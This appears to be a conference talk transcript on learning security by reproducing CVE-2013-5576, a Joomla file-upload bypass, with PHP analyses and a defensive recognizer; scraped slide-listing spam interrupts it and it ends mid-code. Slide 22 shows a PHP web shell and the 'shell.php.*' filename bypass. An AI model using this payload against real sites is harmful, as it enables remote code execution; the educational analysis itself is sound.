Climbing the InfoSec Skill Tree Image courtesy of Wikipedia
Climb the infosec skill tree by revisiting past CVEs
Sandra Escandor-O’Keefe
Security Engineer at Fastly
s3scand0r
Talk Outline
● What’s In It For You?
● A Suggested Strategy
● Fundamental Concept Trees
● CVE-2013-5576 As Example
● Revisiting Ideas Related to CVE
● Conclusion
Motivation
(Image: from Andreas Vesalius' Fabrica, published in 1543)
There are more problems to solve in information security than there are people to solve them. We need a continuous source of fresh brains to solve these problems.
For (Potential) Mentors
● Major benefit: helps you to look at concepts with fresh eyes
● Structuring a mentorship relationship is a challenge
○ This talk can help you get an idea of how to structure such a relationship
For Skill Builders
The Skill Builder sees:
● The path is hazy
● A CVE, but how was the reasoning developed?
This way leads to technical mastery
A Suggested Approach
Reproduce CVE findings
Motivation for the Skill Builder
● Reproduction leads to a deeper understanding of:
○ The system where the vulnerability lies
○ The vulnerability and why it’s there
○ Where the system tends to be vulnerable
○ Fundamental technical concepts
General Strategy
● Inspired by “How to Read a Paper” by S. Keshav
○ Three-pass approach to reading a research paper
● CVE findings are essentially research findings, but they may or may not have a formal paper associated with them
General Approach
● First pass: quick glance
● Second pass:
○ Set up a test environment
○ Get a feel for the structure of the vulnerable segment of code
● Third pass: look at the details
First Pass
Ask:
● What tools do you think were used to find the vulnerability?
● What are the fundamental concepts related to this vulnerability? (e.g. client-server architecture; communication protocol specifics, like HTTP)
● How would you classify this vulnerability?
● How would you set up a test environment?
Second Pass
Examine, but not in too much detail:
● Diff of the fix vs. the vulnerable code
○ Get a feel for the structure of the surrounding code where the vulnerability exists
● Set up a test environment
Third Pass
● Attempt to hit the vulnerability without using the existing exploit
○ Manual experimentation?
○ Write a script?
○ Other existing tools? (e.g. Tamper Data)
● Think about why the vulnerability exists
● Create a Fundamental Concepts Tree
Third Pass cont’d
● Run the current existing exploit afterwards
● If running the existing exploit was not smooth, debug until it runs well
○ Make notes of what you needed to change
○ Equivalent to Keshav’s “You should identify and challenge every assumption in every statement”
Third Pass cont’d.
Borrowing from Sid Meier’s Alpha Centauri: create a fundamental concepts tree
Fundamental Concepts Tree
(Diagram: a concept tree rooted at CVE-2013-5576 with the following nodes; the edges are not recoverable from the slide text)
● CVE-2013-5576 (root)
● Client-Server Model
● HTTP Headers
● HTTP Protocol
● OSI Model
● Input Validation Vulnerabilities
● Arbitrary Code Execution
● Absolute and Relative Pathnames
● File System Structure
● File System Permissions
● Arbitrary File Uploads
Fundamental Concepts Trees
Allow us to:
● Reflect on what we learned
○ Where do we lack understanding?
● Help others learn
Introducing CVE-2013-5576
● Bug reported to Joomla! by VeraSafe
● Joomla Media Manager component vulnerability
● Arbitrary file upload vulnerability
● Results in arbitrary code execution
● Affected: Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4
CVE-2013-5576 as Example
After the first pass, what did I do?
● Created a test environment
● Diffed the vulnerable code with the fixed code
● Manually tested for the vulnerability without the original exploit
● Examined what makes the code vulnerable
● Examined the original exploit in detail
CVE-2013-5576 as Example, cont’d.
Test Environment Details
● On VM: Ubuntu 64-bit 12.04.5 (Ubuntu Precise)
● PHP 5.3.10-1ubuntu3.26
● Apache 2.2.22 (Ubuntu)
● Followed the installation instructions for Joomla 3.1.4 Stable (Ember)
CVE-2013-5576 as Example, cont’d.
Vulnerable Code (snippet of canUpload(..)):
$format = strtolower(JFile::getExt($file['name']));
...
if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
    return false; // Not allowed to upload file
}
Key condition: if this is true, then the upload is NOT allowed. If the filename extension is not in $allowable AND the filename extension is not in $ignored, then don’t allow the upload.

Vulnerable Code vs. Fixed Code (the key condition):
Vulnerable:
if (!in_array($format, $allowable) && !in_array($format, $ignored))
Fixed:
if ($format == '' || $format == false || (!in_array($format, $allowable) && !in_array($format, $ignored)))
Fix: an extra condition was added, so an empty (or FALSE) $format is rejected outright.
CVE-2013-5576 Manual Testing
● Used the Tamper Data browser plugin
● Modified the filename passed to the server by experimenting
○ Based on filename strings that I’ve seen before that cause issues, e.g. “*.*”, “.*”, etc.
○ Watch the response behavior
CVE-2013-5576 Manual Testing, cont’d
Create an administrator type user, log in, and use the “Media Manager” option to upload a file. Before uploading the file, set Tamper Data to start the tamper.

Original POST data (regular request; CRLF line endings shown as line breaks):
-----------------------------112817922114815867397460213
Content-Disposition: form-data; name="Filedata[]"; filename="shell.php"
Content-Type: application/x-php

<?php
system($_SERVER['HTTP_ACCEPT_LANGUAGE']);
?>

-----------------------------112817922114815867397460213
Content-Disposition: form-data; name="folder"


-----------------------------112817922114815867397460213
Content-Disposition: form-data; name="return-url"

aW5kZXgucGhwP29wdGlvbj1jb21fbWVkaWE=
-----------------------------112817922114815867397460213--

New POST data: identical, except that “.*” is added to the end of the filename, i.e. filename="shell.php.*"
Why Does Vulnerability Occur?
● We know that $format is problematic (from diffing the fixed vs. vulnerable code)
● Examine how $format is generated; see JFile::getExt (in libraries/joomla/filesystem/file.php)

Vulnerable Code (snippet of canUpload(..)):
$format = strtolower(JFile::getExt($file['name']));
...
if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
    return false; // Not allowed to upload file
}

(snippet of getExt, called by canUpload(..)):
public static function getExt($file)
{
    $dot = strrpos($file, '.') + 1; // position just after the last "."
    return substr($file, $dot);
}
Why Does Vulnerability Occur? cont’d.
What I initially assumed:
Tamper Data modifies the POST request so that $file = “shell.php.*”
In JFile::getExt, the filename is indexed as:
index: 0 1 2 3 4 5 6 7 8 9 10 11
char:  s h e l l . p h p . *  \0
For PHP’s substr, see: github.com/php/php-src/blob/master/ext/standard/string.c
PHP’s substr should give back “*”
Why Does Vulnerability Occur? cont’d.
In reality:
Tamper Data modifies the POST request, but after Joomla’s filename cleanup $file = “shell.php.” (the trailing “*” has been stripped)
In JFile::getExt:
index: 0 1 2 3 4 5 6 7 8 9 10
char:  s h e l l . p h p . \0
$dot = strrpos($file, '.') + 1 = 9 + 1 = 10
Working through PHP_FUNCTION(substr) (see github.com/php/php-src/blob/master/ext/standard/string.c):
ZSTR_LEN(str) = 9
f = 10 (this is $dot above)
Then the following condition is met:
if (f > (zend_long) ZSTR_LEN(str)) {
    RETURN_FALSE;
}
PHP’s substr returns FALSE, so getExt returns FALSE.
Why Does Vulnerability Occur? cont’d.
Vulnerable Code (snippet of canUpload(..)):
$format = strtolower(JFile::getExt($file['name']));
$allowable = explode(',', $upload_extensions);
$ignored = explode(',', $ignore_extensions);
if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
    return false; // Not allowed to upload file
}

● getExt returns FALSE => $format = '' (empty string; strtolower(FALSE) yields '')
● $allowable is an array of accepted file extensions.
  !in_array($format, $allowable) => TRUE (i.e. the extension is NOT allowed)
● $ignored is an array of extensions to let pass through. Default install: $ignore_extensions is the empty string.
  Because the textbox input is empty, after explode the result is Array( [0] => '' ): an array with one element whose value is '', therefore $format is in it.
  !in_array($format, $ignored) => FALSE (i.e. our file extension is allowed to pass through)
● TRUE && FALSE => FALSE, therefore the file upload is allowed.
Why Does Vulnerability Occur? cont’d.
In reality: Tamper Data modifies the POST request, Joomla’s filename cleanup runs, and only then does JFile::getExt see $file = “shell.php.”
JFile::makeSafe filters out (regular expressions with their escaping restored):
● Any two or more consecutive “.” (i.e. “..”, “...”): (\.){2,}
● Any character that is not alphanumeric, a “.”, a “_”, a “-”, or a single space: [^A-Za-z0-9\.\_\- ]
● Any single “.” at the beginning: ^\.
Result: “shell.php.*” becomes “shell.php.” (the “*” is removed; the trailing “.” survives)
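The whole path walked through on the slides above (makeSafe cleanup, getExt, then the vulnerable and the fixed canUpload condition) as one stand-alone PHP example. This is added here and is not Joomla's or the talk's own code; the wrapper function names, the extension lists and the sample filenames are assumptions made for the demo.

```php
<?php
// Added example, not Joomla's or the talk's code: a stand-alone model of the
// CVE-2013-5576 check. makeSafe(), getExt() and the vulnerable/fixed conditions
// follow the snippets on the slides; the wrapper functions, the extension
// lists and the sample filenames are constructed for this demo.

// Joomla's filename cleanup as described above: strip runs of two or more
// dots, any character outside [A-Za-z0-9._- ], and a single leading dot.
// A trailing dot survives, so "shell.php.*" becomes "shell.php.".
function makeSafe($file)
{
    $regex = array('#(\.){2,}#', '#[^A-Za-z0-9\.\_\- ]#', '#^\.#');
    return trim(preg_replace($regex, '', $file));
}

// JFile::getExt as shown above. For "shell.php." $dot equals strlen($file):
// PHP 5 substr() returns FALSE there and PHP 7+ returns '', and strtolower()
// maps both to '', so the outcome is the same on either version.
function getExt($file)
{
    $dot = strrpos($file, '.') + 1;
    return substr($file, $dot);
}

// Vulnerable canUpload() decision: TRUE means the upload is allowed.
// $uploadExtensions and $ignoreExtensions are the comma-separated settings.
function canUploadVulnerable($name, $uploadExtensions, $ignoreExtensions)
{
    $format    = strtolower(getExt(makeSafe($name)));
    $allowable = explode(',', $uploadExtensions);
    $ignored   = explode(',', $ignoreExtensions); // '' explodes to array('')

    if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
        return false; // Not allowed to upload file
    }
    return true;
}

// Fixed decision: the added condition rejects an empty or FALSE extension
// before the allow/ignore lists are consulted.
function canUploadFixed($name, $uploadExtensions, $ignoreExtensions)
{
    $format    = strtolower(getExt(makeSafe($name)));
    $allowable = explode(',', $uploadExtensions);
    $ignored   = explode(',', $ignoreExtensions);

    if ($format == '' || $format == false
        || (!in_array($format, $allowable) && !in_array($format, $ignored))) {
        return false;
    }
    return true;
}

$uploadExtensions = 'jpg,png,gif'; // constructed allow-list
$ignoreExtensions = '';            // default install: empty string

// With an empty ignore list, in_array('', array('')) is TRUE: the empty
// extension counts as "ignored", which is what the vulnerable check relies on.
var_dump(in_array('', explode(',', $ignoreExtensions)));

foreach (array('photo.jpg', 'shell.php', 'shell.php.*') as $name) {
    printf("%-12s -> %-11s vulnerable=%s fixed=%s\n",
        $name, makeSafe($name),
        canUploadVulnerable($name, $uploadExtensions, $ignoreExtensions) ? 'ALLOW' : 'deny',
        canUploadFixed($name, $uploadExtensions, $ignoreExtensions) ? 'ALLOW' : 'deny');
}
```

Run it with the PHP CLI; the third sample shows the trailing-dot name passing the vulnerable check and being refused by the fixed one, which is the whole bug in three lines of output.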
Comparing CVE-2013-5576 Exploits
Given the findings of the manual tests, the initial PoC:
● Had a trailing “.*”
○ Analysis of the vuln afterwards showed this trailing “*” was unnecessary (i.e. only the trailing “.” is needed for exploitation)
CVE-2013-5576 Takeaways
● Linux filenames are just a sequence of bytes that can’t contain 0x00 or 0x2F (slash, ‘/’) (Source: http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_170)
○ Therefore, “webshell.php.” is a valid filename
● It’s worth exploring the C source code of PHP, especially for standard string functions, e.g. substr, strrpos
○ We can miss a lot, especially edge cases, by only looking at documentation
Some Additional Things To Think About
Revisiting Ideas Related to CVE
● LangSec - a defense method
○ Proposed by Meredith L. Patterson, Sergey Bratus, and Dan Hirsch @ BruCON ’12
○ Any processing of untrusted input should have a formal language that defines valid input
○ The input handler should be a “recognizer” for that valid input
○ Big concept here: Finite State Machines
Revisiting Ideas Related to CVE
Example: only process a binary number with an even number of 0s
(Image by Cepheus - Own work, Public Domain, https://commons.wikimedia.org/w/index.php?curid=1234893: a finite state machine with its Input and its Accept State marked)
Further processing can safely be done on the data only if the finite state machine is in the accept state after the input has been processed.
Take-home Challenge
What modifications can you make to Joomla 3.1.4 in order to create a recognizer for the Joomla Media Manager component, such that it recognizes valid filenames and only allows processing of those?
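One way to start on the challenge above, as an added example rather than the talk's or Joomla's code: the filename check written as an explicit finite state machine in the LangSec sense, so that "shell.php." never reaches the accept state. The accepted language, the state names and the allow-list are this example's own assumptions.

```php
<?php
// Added example (not Joomla's code): a LangSec-style recognizer for upload
// filenames, written as an explicit finite state machine. The accepted
// language (constructed for this demo) is: one or more name characters, then
// one or more groups of "." followed by one or more alphanumeric extension
// characters. "shell.php.", ".htaccess", "a..b.png" and "shell.php.*" all
// end outside the accept state, so they are refused before any other logic.

const S_START = 0; // nothing consumed yet
const S_NAME  = 1; // inside the base name
const S_DOT   = 2; // just consumed a "."; an extension character must follow
const S_EXT   = 3; // inside an extension (the only accept state)
const S_ERROR = 4; // dead state: input is outside the language

function isNameChar($c)
{
    return ctype_alnum($c) || $c === '_' || $c === '-';
}

// Runs the DFA over the raw byte string and returns the final state.
function runFilenameDfa($filename)
{
    $state = S_START;
    $len = strlen($filename);
    for ($i = 0; $i < $len; $i++) {
        $c = $filename[$i];
        switch ($state) {
            case S_START:
                $state = isNameChar($c) ? S_NAME : S_ERROR;
                break;
            case S_NAME:
                if (isNameChar($c))  { $state = S_NAME; }
                elseif ($c === '.')  { $state = S_DOT; }
                else                 { $state = S_ERROR; }
                break;
            case S_DOT:
                $state = ctype_alnum($c) ? S_EXT : S_ERROR;
                break;
            case S_EXT:
                if (ctype_alnum($c)) { $state = S_EXT; }
                elseif ($c === '.')  { $state = S_DOT; }
                else                 { $state = S_ERROR; }
                break;
            default:
                return S_ERROR; // dead state absorbs the rest of the input
        }
    }
    return $state;
}

// Only a string the recognizer accepts is processed further: the extension
// is then read from the recognized structure and checked against the
// allow-list with a strict comparison, so '' can never match anything.
function recognizeUpload($filename, array $allowedExtensions)
{
    if (runFilenameDfa($filename) !== S_EXT) {
        return false; // not in the language: refuse before any other processing
    }
    $ext = strtolower(substr($filename, strrpos($filename, '.') + 1));
    return in_array($ext, $allowedExtensions, true);
}

$allowed = array('jpg', 'png', 'gif'); // constructed allow-list
foreach (array('photo.jpg', 'photo.JPG', 'shell.php', 'shell.php.',
               'shell.php.*', '.htaccess', 'a..b.png') as $name) {
    printf("%-12s %s\n", $name, recognizeUpload($name, $allowed) ? 'accept' : 'reject');
}
```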
Shown:
● A suggested approach for the Skill Builder
● Creating fundamental concept trees to help you and others
● An example thought process through a CVE
● Revisited ideas related to the CVE
Thanks for listening
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 

Thotcon0x9 Presentation: Climb the infosec skill tree by revisiting past CVEs

• 11. Second Pass
Examine, but not in too much detail:
● Diff of the fix vs. the vulnerable code
○ Get a feel for the structure of the surrounding code where the vulnerability exists
● Set up a test environment

• 12. Third Pass
● Attempt to hit the vulnerability without using the existing exploit
○ Manual experimentation?
○ Write a script?
○ Other existing tools? (e.g. Tamper Data)
● Think about why the vulnerability exists
● Create a Fundamental Concepts Tree

• 13. Third Pass, cont'd
● Run the existing exploit afterwards
● If running the existing exploit was not smooth, debug until it runs well
○ Make notes of what you needed to change
○ Equivalent to Keshav's "You should identify and challenge every assumption in every statement"

• 14. Third Pass, cont'd
Borrowing from Sid Meier's Alpha Centauri: create a fundamental concepts tree

• 15. Fundamental Concepts Tree
Concepts in the tree for CVE-2013-5576:
● Client-Server Model
● HTTP Headers
● HTTP Protocol
● OSI Model
● Input Validation Vulnerabilities
● Arbitrary Code Execution
● Absolute and Relative Pathnames
● File System Structure
● File System Permissions
● Arbitrary File Uploads

• 16. Fundamental Concepts Trees
Allow us to:
● Reflect on what we learned
○ Where do we lack understanding?
● Help others learn

• 17. Introducing CVE-2013-5576
● Bug reported to Joomla! by Verasafe
● Vulnerability in the Joomla Media Manager component
● Arbitrary file upload vulnerability
● Results in arbitrary code execution
● Affected: Joomla 2.5.x up to 2.5.13, as well as 3.x up to 3.1.4

• 18. CVE-2013-5576 as Example
After the first pass, what did I do?
● Created a test environment
● Diffed the vulnerable code with the fixed code
● Manually tested for the vulnerability without the original exploit
● Examined what makes the code vulnerable
● Examined the original exploit in detail

• 19. CVE-2013-5576 as Example, cont'd.
Test Environment Details
● On a VM: Ubuntu 64-bit 12.04.5 (Ubuntu Precise)
● PHP 5.3.10-1ubuntu3.26
● Apache 2.2.22 (Ubuntu)
● Followed the installation instructions for Joomla 3.1.4 Stable (Ember)
• 20. CVE-2013-5576 as Example, cont'd.
Vulnerable Code (snippet of canUpload(..)):

    $format = strtolower(JFile::getExt($file['name']));
    ...
    if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
        return false; // Not allowed to upload file
    }

Key condition: if the if-test is true, then the upload is NOT allowed. In words: if the filename extension is not in $allowable AND the filename extension is not in $ignored, then don't allow the upload.

Fixed Code (extra condition added):

    if ($format == '' || $format == false || (!in_array($format, $allowable) && !in_array($format, $ignored)))

• 21. CVE-2013-5576 Manual Testing
● Used the Tamper Data browser plugin
● Modified the filename passed to the server by experimenting
○ Based on filename strings that I've seen before that cause issues, e.g. "*.*", ".*", etc.
○ Watched the response behaviour

• 22. CVE-2013-5576 Manual Testing, cont'd
Create an administrator-type user, log in, and use the "Media Manager" option to upload a file. Before uploading the file, set Tamper Data to start tampering.

Original POST data (regular request; the \r\n line endings of the multipart body are shown as line breaks):

    -----------------------------112817922114815867397460213
    Content-Disposition: form-data; name="Filedata[]"; filename="shell.php"
    Content-Type: application/x-php

    <?php
    system($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    ?>

    -----------------------------112817922114815867397460213
    Content-Disposition: form-data; name="folder"


    -----------------------------112817922114815867397460213
    Content-Disposition: form-data; name="return-url"

    aW5kZXgucGhwP29wdGlvbj1jb21fbWVkaWE=
    -----------------------------112817922114815867397460213--

(The return-url value is base64 for index.php?option=com_media. The uploaded file runs whatever arrives in the Accept-Language request header as a shell command.)

New POST data: identical, except that ".*" is added to the filename in the Filedata[] part:

    Content-Disposition: form-data; name="Filedata[]"; filename="shell.php.*"

• 23. Why Does the Vulnerability Occur?
● We know that $format is problematic (from diffing the fixed vs. vulnerable code)
● Examine how $format is generated: see JFile::getExt (in libraries/joomla/filesystem/file.php)

Vulnerable Code (snippet of canUpload(..)):

    $format = strtolower(JFile::getExt($file['name']));
    ...
    if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
        return false; // Not allowed to upload file
    }

Snippet of JFile::getExt, called by canUpload(..):

    public static function getExt($file)
    {
        $dot = strrpos($file, '.') + 1;
        return substr($file, $dot);
    }

• 24. Why Does the Vulnerability Occur? cont'd.
What I initially assumed: the Tamper Data-modified POST request makes $file = "shell.php.*" inside JFile::getExt.

    index: 0 1 2 3 4 5 6 7 8 9 10 11
    char:  s h e l l . p h p .  *  \0

strrpos finds the last "." at index 9, so $dot = 10 and PHP's substr should give back "*". (For PHP's substr, see github.com/php/php-src/blob/master/ext/standard/string.c.)

• 25. Why Does the Vulnerability Occur? cont'd.
In reality, Joomla's filename cleanup runs first (slide 27), so by the time JFile::getExt is called the Tamper Data-modified name has become $file = "shell.php." (10 bytes):

    index: 0 1 2 3 4 5 6 7 8 9 10
    char:  s h e l l . p h p .  \0

$dot = strrpos($file, '.') + 1 = 9 + 1 = 10, so getExt evaluates substr($file, 10). Working through PHP_FUNCTION(substr) in ext/standard/string.c: ZSTR_LEN(str) = 10 and f = 10 (this is $dot above). The guard quoted on the slide,

    if (f > (zend_long) ZSTR_LEN(str)) {
        RETURN_FALSE;
    }

catches a start offset past the end of the string; with f equal to the length it is substr's companion guard for a start offset at or beyond the end (f >= ZSTR_LEN(str) in the pre-8.0 source) that fires. On PHP 5 and 7 substr therefore returns FALSE; PHP 8.0 changed this case to return an empty string, which strtolower turns into the same '' as FALSE. Either way, getExt returns no extension.

• 26. Why Does the Vulnerability Occur? cont'd.
Vulnerable Code (snippet of canUpload(..)):

    $format    = strtolower(JFile::getExt($file['name']));
    $allowable = explode(',', $upload_extensions);
    $ignored   = explode(',', $ignore_extensions);
    if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
        return false; // Not allowed to upload file
    }

● getExt returns FALSE, so strtolower(FALSE) gives $format = '' (empty string)
● $allowable is an array of accepted file extensions. !in_array($format, $allowable) => TRUE (i.e. the extension is NOT allowed)
● $ignored is an array of extensions to let pass through. On a default install $ignore_extensions is the empty string, because the textbox input is empty; after explode it is Array( [0] => '' ), an array with one element whose value is '', so $format is in it. !in_array($format, $ignored) => FALSE (i.e. our file extension is allowed to pass through)
● TRUE && FALSE => FALSE, so the return false branch is skipped and the file upload is allowed

• 27. Why Does the Vulnerability Occur? cont'd.
Joomla filename cleanup: before getExt runs, JFile::makeSafe filters the filename. It removes:
● Any two or more consecutive "." (i.e. "..", "..."): (\.){2,}
● Any character that is not alphanumeric, ".", "_", "-", or a single space: [^A-Za-z0-9._\- ]
● Any single "." at the beginning: ^\.
So the Tamper Data-modified filename "shell.php.*" becomes "shell.php.": the "*" is gone, but the trailing "." survives because only a leading dot and runs of two or more dots are removed, and that is what getExt receives.
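The whole chain from slides 20 and 23 to 27 in one runnable file. This is an added example, not Joomla's code or the speaker's: the function names makeSafe(), getExt(), canUploadVulnerable() and canUploadFixed() are this example's own, their bodies follow the snippets on the slides (the real code is spread over the media helper and JFile), the makeSafe() regexes are reconstructed from the description on slide 27, and the allow-list 'bmp,gif,jpg,png' is a constructed stand-in for the admin-configured list of upload extensions. Run it from the command line with php on PHP 7 or 8.

```php
<?php
// Added example (not Joomla's code): a stand-alone model of the check chain
// described on slides 20 and 23-27, so the bypass can be run and watched
// with `php cve-2013-5576-check.php`. Function bodies follow the snippets
// on the slides; the makeSafe() regexes are reconstructed from slide 27.

// Slide 27: JFile::makeSafe strips runs of dots, disallowed characters and
// a leading dot. "shell.php.*" therefore becomes "shell.php." (trailing dot
// kept).
function makeSafe(string $file): string
{
    $regex = ['#(\.){2,}#', '#[^A-Za-z0-9\.\_\- ]#', '#^\.#'];
    return trim(preg_replace($regex, '', $file));
}

// Slide 23: JFile::getExt. For "shell.php." $dot is 10 and the string is
// 10 bytes long, so substr() starts at the end of the string and returns
// FALSE on PHP 5/7 (an empty string on PHP 8).
function getExt(string $file)
{
    $dot = strrpos($file, '.') + 1;
    return substr($file, $dot);
}

// Slides 20/26: the vulnerable canUpload() condition. $uploadExtensions and
// $ignoreExtensions are the comma-separated admin settings; on a default
// install the ignore list is the empty string.
function canUploadVulnerable(string $name, string $uploadExtensions, string $ignoreExtensions = ''): bool
{
    $format    = strtolower(getExt(makeSafe($name)));   // FALSE -> ""
    $allowable = explode(',', $uploadExtensions);
    $ignored   = explode(',', $ignoreExtensions);       // "" -> [""]
    if (!in_array($format, $allowable) && !in_array($format, $ignored)) {
        return false; // Not allowed to upload file
    }
    return true;
}

// Slide 20: the fix adds an explicit rejection of an empty/false $format.
function canUploadFixed(string $name, string $uploadExtensions, string $ignoreExtensions = ''): bool
{
    $format    = strtolower(getExt(makeSafe($name)));
    $allowable = explode(',', $uploadExtensions);
    $ignored   = explode(',', $ignoreExtensions);
    if ($format == '' || $format == false
        || (!in_array($format, $allowable) && !in_array($format, $ignored))) {
        return false;
    }
    return true;
}

// Constructed sample of the admin allow-list and of attacker filenames.
$allowed = 'bmp,gif,jpg,png';
foreach (['logo.png', 'shell.php', 'shell.php.*', 'shell.php.', '../shell.php'] as $name) {
    printf("%-14s -> safe=%-12s ext=%-7s vulnerable:%s fixed:%s\n",
        $name,
        makeSafe($name),
        var_export(getExt(makeSafe($name)), true),
        canUploadVulnerable($name, $allowed) ? 'ALLOW' : 'deny',
        canUploadFixed($name, $allowed) ? 'ALLOW' : 'deny');
}
```

On PHP 5 and 7 the ext column prints false for shell.php. and shell.php.*, on PHP 8 it prints '' (substr() stopped returning FALSE for a start offset equal to the length in 8.0); either way $format is the empty string and only the vulnerable check lets those two names through, while shell.php and ../shell.php (which makeSafe() turns into shell.php) are denied by both. Setting the ignore list to anything non-empty, e.g. canUploadVulnerable($name, $allowed, 'tmp'), also denies the upload in the vulnerable version, because '' is then no longer an element of $ignored; the bypass depends on the default, empty setting.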
• 28. Comparing CVE-2013-5576 Exploits
Given the findings of the manual tests, the initial PoC:
● Had a trailing ".*"
○ Analysis of the vulnerability afterwards showed the trailing "*" was unnecessary (i.e. only the trailing "." is needed for exploitation)

• 29. CVE-2013-5576 Takeaways
● Linux filenames are just a sequence of bytes that can't contain 0x00 or 0x2F (slash, "/") (Source: http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap03.html#tag_03_170)
○ Therefore, "webshell.php." is a valid filename
● Whether the server then executes "webshell.php." as PHP depends on how requests are mapped to the PHP handler: Apache's mod_mime treats each dot-separated part of a name as a possible extension, so "php" can still select the handler, whereas a handler rule anchored on \.php$ would not match. Check the handler configuration of the test VM when reproducing.
● It's worth exploring the C source code of PHP, especially for the standard string functions, e.g. substr, strrpos
○ We can miss a lot, especially edge cases, by only looking at the documentation
○ Also check which PHP version you are reading: substr() with a start offset equal to the string length returns FALSE on PHP 5 and 7 but an empty string on PHP 8.0 and later

• 30. Some Additional Things To Think About
Image courtesy of Wikipedia

• 31. Revisiting Ideas Related to the CVE
● LangSec, a defence method
○ Proposed by Meredith L. Patterson, Sergey Bratus, and Dan Hirsch @ Brucon '12
○ Any processing of untrusted input should have a formal language that defines the valid input
○ The input handler should be a "recognizer" for that valid input
○ Big concept here: finite state machines

• 32. Revisiting Ideas Related to the CVE
Example: only process a binary number with an even number of 0s.
(State diagram on the slide, labelled "Input" and "Accept State". Image by Cepheus, own work, public domain, https://commons.wikimedia.org/w/index.php?curid=1234893)
Further processing can safely be done on the data only if the finite state machine is in an accept state after the input has been processed.
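The recognizer idea from slides 31 and 32 in running code, as an added example that is not part of the talk or of Joomla: one table-driven DFA runner, applied first to the slide's even-number-of-0s machine and then to a machine that accepts only media filenames of the form base.ext with ext taken from an allow-list. The filename machine goes beyond the slide's binary example; its state names, the base-name alphabet of letters, digits, "_" and "-", and the sample allow-list are this example's own choices, and its language is deliberately stricter than JFile::makeSafe (no spaces, no second dot). It is one shape an answer to the take-home challenge on the next slide could take, outside Joomla's code base. Requires PHP 7.4 or later.

```php
<?php
// Added example, not code from the talk or from Joomla: a table-driven
// finite-state recognizer in the LangSec style of slides 31-32. One runDfa()
// routine drives the slide's "even number of 0s" machine and a machine for
// media filenames built from an allow-list of extensions. State names, the
// base-name alphabet and the sample extension list are this example's own.
// Requires PHP 7.4+ (arrow functions).

// A DFA here is: start state, accept states, a per-character classifier and
// a transition table delta[state][class] => next state. A missing entry
// means "no transition", which is a reject: the machine never reaches an
// accept state for input outside the language.
function runDfa(array $dfa, string $input): bool
{
    $state = $dfa['start'];
    for ($i = 0, $n = strlen($input); $i < $n; $i++) {
        $class = ($dfa['classify'])($input[$i]);
        if (!isset($dfa['delta'][$state][$class])) {
            return false;
        }
        $state = $dfa['delta'][$state][$class];
    }
    // Slide 32: further processing is safe only if we end in an accept state.
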